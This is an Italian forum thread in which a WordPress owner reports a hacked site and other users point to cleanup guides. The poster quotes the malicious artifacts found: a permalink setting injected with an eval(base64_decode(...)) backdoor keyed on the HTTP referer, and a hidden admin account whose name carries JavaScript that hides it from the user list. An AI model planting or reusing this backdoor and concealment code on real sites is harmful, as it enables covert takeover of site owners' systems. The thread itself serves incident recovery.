HELP: sito in Wordpress hackerato :-(

joe79

HELP: sito in Wordpress hackerato :-(

Ciao a tutti,
ho disperatamente bisogno di aiuto.

Ho subito un attacco al sito e dovrei cercare di mettere le cose a posto, se possibile.

Stamattina ho trovato gli url cambiati così:

da /%postname% a

/%year%/%month%/%day%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

sistemati i permalink, ho scovato un utente amministratore che aveva questa roba come nome.

<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode;
};
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags*.innerHTML;
var h=tags*;
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr*.className=="subsubsub"){
var n=/>Administrator ((d+))</gi.exec(arr*.innerHTML);
if(n[1]>0){
var txt=arr*.innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
arr*.innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);
</script></div>

Ho eliminato in wp-users e usermeta le righe associate.

Ho un backup del database ma non so bene cosa e dove cercare altre porcherie, prima di rimuovere tutto e reinstallare l'ultima versione di WP da capo su cui ripristinare il DB...

Chi sapesse consigliarmi mi farebbe un piacere enorme

blays

Per curiosità...che versione di wordpress avevi?

joe79

2.7.1

geggiot

Ti consiglio di seguire questa guida http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ intanto mi sto informando sul tipo di attacco qui http://wordpress.org/support/topic/307660 c'è gia un post a riguardo.
Segnalo anche questo link http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/ .